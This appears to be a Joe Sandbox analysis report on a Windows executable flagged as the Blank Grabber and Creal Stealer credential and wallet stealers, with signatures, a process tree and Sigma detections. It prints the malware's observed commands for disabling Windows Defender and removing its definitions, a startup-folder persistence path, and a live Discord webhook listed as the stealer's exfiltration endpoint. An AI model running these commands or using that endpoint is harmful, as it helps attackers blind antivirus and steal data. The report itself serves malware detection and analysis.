Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe

Overview

General Information

Sample name:#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe
renamed because original name is a hash value
Original sample name: .exe
Analysis ID:1553259
MD5:3ac5f99224a92851c80fe4178fff6002
SHA1:20eae332be7470533009e2a0f28412463acb1f06
SHA256:a21cd46fbedb13199e3675a4ee14af9914547d237342fca0c8cd8022a7888363
Tags:exeuser-aachum
Infos:

Detection

Blank Grabber, Creal Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Blank Grabber
Yara detected Creal Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Check if machine is in data center or colocation facility
Drops PE files to the startup folder
Found many strings related to Crypto-Wallets (likely being stolen)
Loading BitLocker PowerShell Module
Modifies Windows Defender protection settings
Removes signatures from Windows Defender
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powershell Defender Disable Scan Feature
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Tries to steal communication platform credentials (via file / registry access)
Binary contains a suspicious time stamp
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect virtual machines (SGDT)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
File is packed with WinRar
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe (PID: 4976 cmdline: "C:\Users\user\Desktop\#U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exe" MD5: 3AC5F99224A92851C80FE4178FFF6002)
    • Creal.exe (PID: 5676 cmdline: "C:\Users\user\Desktop\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
      • Creal.exe (PID: 2432 cmdline: "C:\Users\user\Desktop\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
        • cmd.exe (PID: 4904 cmdline: C:\Windows\system32\cmd.exe /c "curl ifconfig.me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 3224 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • curl.exe (PID: 5388 cmdline: curl ifconfig.me MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
    • Built.exe (PID: 2760 cmdline: "C:\Users\user\Desktop\Built.exe" MD5: 12E9F3CE18351EE539646C23CC862C5C)
      • Built.exe (PID: 2536 cmdline: "C:\Users\user\Desktop\Built.exe" MD5: 12E9F3CE18351EE539646C23CC862C5C)
        • cmd.exe (PID: 5424 cmdline: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 6720 cmdline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)
        • cmd.exe (PID: 2332 cmdline: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 2792 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • powershell.exe (PID: 1052 cmdline: powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend MD5: 04029E121A0CFA5991749937DD22A1D9)
            • WmiPrvSE.exe (PID: 6552 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
          • MpCmdRun.exe (PID: 4932 cmdline: "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All MD5: B3676839B2EE96983F9ED735CD044159)
        • cmd.exe (PID: 1032 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 6236 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • tasklist.exe (PID: 6620 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • cmd.exe (PID: 6940 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
          • conhost.exe (PID: 5200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • WMIC.exe (PID: 1056 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
  • Creal.exe (PID: 4236 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
    • Creal.exe (PID: 2244 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe" MD5: 017603B860F67F7F65F724E519465926)
      • cmd.exe (PID: 1656 cmdline: C:\Windows\system32\cmd.exe /c "curl ifconfig.me" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • curl.exe (PID: 3164 cmdline: curl ifconfig.me MD5: EAC53DDAFB5CC9E780A7CC086CE7B2B1)
  • cleanup

Malware Configuration

Threatname: Creal Stealer

{"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}

Threatname: Blank Grabber

{"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\_MEI27602\rarreg.keyJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000003.00000003.2109058666.00000124EBC34000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
      00000019.00000002.3354239060.00000227B8F10000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
        00000003.00000003.2109058666.00000124EBC32000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
          00000004.00000003.2126560706.000002D966CE3000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_BlankGrabberYara detected Blank GrabberJoe Security
            00000005.00000002.2425561292.00000203E8210000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_CrealStealerYara detected Creal StealerJoe Security
              Click to see the 4 entries

              Sigma Signatures

              System Summary

              barindex
              Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Built.exe" , ParentImage: C:\Users\user\Desktop\Built.exe, ParentProcessId: 2536, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", ProcessId: 5424, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Disable Scan Feature
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Built.exe" , ParentImage: C:\Users\user\Desktop\Built.exe, ParentProcessId: 2536, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 2332, ProcessName: cmd.exe
              Sigma detected: Powershell Defender Exclusion
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Built.exe" , ParentImage: C:\Users\user\Desktop\Built.exe, ParentProcessId: 2536, ParentProcessName: Built.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", ProcessId: 5424, ProcessName: cmd.exe
              Sigma detected: Startup Folder File Write
              Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\Creal.exe, ProcessId: 2432, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Creal.exe
              Sigma detected: Usage Of Web Request Commands And Cmdlets
              Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: C:\Windows\system32\cmd.exe /c "curl ifconfig.me", CommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.me", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Creal.exe" , ParentImage: C:\Users\user\Desktop\Creal.exe, ParentProcessId: 2432, ParentProcessName: Creal.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "curl ifconfig.me", ProcessId: 4904, ProcessName: cmd.exe
              Sigma detected: Non Interactive PowerShell Process Spawned
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe', CommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe', CommandLine|base64offset|contains: ^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe'", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5424, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Built.exe', ProcessId: 6720, ProcessName: powershell.exe

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-10T17:02:34.506611+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649726TCP
              2024-11-10T17:03:13.264966+010020229301A Network Trojan was detected52.149.20.212443192.168.2.649956TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Found malware configuration
              Source: Creal.exe.2432.5.memstrminMalware Configuration Extractor: Creal Stealer {"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}
              Source: Built.exe.2536.4.memstrminMalware Configuration Extractor: Blank Grabber {"C2 url": "https://discord.com/api/webhooks/1304534397680357396/jwWT3Q8Ovv9Vvgd-RNJrwcYvcpgO5pbMYyd8C4eotXdFUJqgeAOXJwz_fHbLjM5ITcpj"}
              Multi AV Scanner detection for submitted file
              Source: #U0416#U0430#U0440#U043a#U043e#U0432#U0430 .exeReversingLabs: Detection: 31%
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability

              Location Tracking

              barindex
              Tries to detect the country of the analysis system (by using the IP)
              Source: unknownDNS query: name: geolocation-db.com
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF68E90 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,5_2_00007FFD8AF68E90
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF3CD30 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF3CD30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A0F ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_CIPHER_CTX_get0_cipher,EVP_CIPHER_get_flags,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_get0_md,EVP_MD_get_size,CRYPTO_memcmp,ERR_set_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_pop_to_mark,ERR_clear_last_mark,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,EVP_MD_CTX_get0_md,CRYPTO_memcmp,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,strncmp,strncmp,strncmp,strncmp,strncmp,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF21A0F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21AB4 CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF21AB4
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF24C00 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF24C00
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6EC10 CRYPTO_free,5_2_00007FFD8AF6EC10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF84C40 ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,RAND_bytes_ex,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_encrypt_init,EVP_PKEY_encrypt,EVP_PKEY_encrypt,EVP_PKEY_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,5_2_00007FFD8AF84C40
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF46AB7 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,ERR_peek_error,5_2_00007FFD8AF46AB7
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2114F CRYPTO_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF2114F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF46AB7 CRYPTO_malloc,ERR_new,ERR_set_debug,CRYPTO_clear_free,OPENSSL_LH_num_items,OPENSSL_LH_num_items,ERR_peek_error,5_2_00007FFD8AF46AB7
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF4EB10 CRYPTO_THREAD_write_lock,OPENSSL_LH_retrieve,OPENSSL_LH_delete,CRYPTO_THREAD_unlock,5_2_00007FFD8AF4EB10
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21460 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,BIO_snprintf,5_2_00007FFD8AF21460
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF36B20 CRYPTO_THREAD_run_once,OPENSSL_sk_find,OPENSSL_sk_value,EVP_CIPHER_fetch,EVP_CIPHER_get_flags,5_2_00007FFD8AF36B20
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF24B30 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF24B30
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF3EB48 CRYPTO_free,5_2_00007FFD8AF3EB48
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22185 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,5_2_00007FFD8AF22185
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF34990 i2d_X509_NAME,i2d_X509_NAME,memcmp,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF34990
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21893 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_strdup,ERR_new,ERR_set_debug,5_2_00007FFD8AF21893
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF217DF ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_realloc,ERR_new,ERR_set_debug,ERR_set_error,5_2_00007FFD8AF217DF
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2204F CRYPTO_free,CRYPTO_malloc,ERR_new,RAND_bytes_ex,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF2204F
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF224EB CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF224EB
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF789F0 CRYPTO_free,CRYPTO_memdup,5_2_00007FFD8AF789F0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21A05 ERR_new,ERR_set_debug,ERR_set_error,ASN1_item_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,_time64,X509_free,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,ASN1_item_free,5_2_00007FFD8AF21A05
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21492 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF21492
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF62A50 SRP_Calc_u_ex,BN_num_bits,CRYPTO_malloc,ERR_new,ERR_set_debug,BN_bn2bin,BN_clear_free,BN_clear_free,5_2_00007FFD8AF62A50
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF84860 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,5_2_00007FFD8AF84860
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF98870 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF98870
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF226B2 ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_strdup,5_2_00007FFD8AF226B2
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6E8C0 CRYPTO_free,5_2_00007FFD8AF6E8C0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF8C8E0 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,CRYPTO_free,5_2_00007FFD8AF8C8E0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF9A8F0 EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_clear_error,ASN1_item_d2i,ASN1_TYPE_get,ERR_new,ERR_set_debug,EVP_PKEY_decrypt,ERR_new,EVP_PKEY_CTX_ctrl,ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_CTX_free,ASN1_item_free,5_2_00007FFD8AF9A8F0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF2139D memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,5_2_00007FFD8AF2139D
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF6E920 CRYPTO_free,5_2_00007FFD8AF6E920
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF34930 CRYPTO_get_ex_new_index,5_2_00007FFD8AF34930
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF21EE2 CRYPTO_free,CRYPTO_strndup,CRYPTO_free,OPENSSL_cleanse,_time64,memcpy,EVP_MD_get0_name,EVP_MD_is_a,ERR_new,ERR_set_debug,OPENSSL_cleanse,ERR_new,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,5_2_00007FFD8AF21EE2
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22144 EVP_CIPHER_get_mode,EVP_CIPHER_get_mode,EVP_CIPHER_get_iv_length,EVP_CIPHER_get_key_length,CRYPTO_malloc,ERR_new,ERR_set_debug,5_2_00007FFD8AF22144
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF220E5 CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,5_2_00007FFD8AF220E5
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF24FD0 CRYPTO_free,5_2_00007FFD8AF24FD0
              Source: C:\Users\user\Desktop\Creal.exeCode function: 5_2_00007FFD8AF22117 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,5_2_00007FFD8AF22117
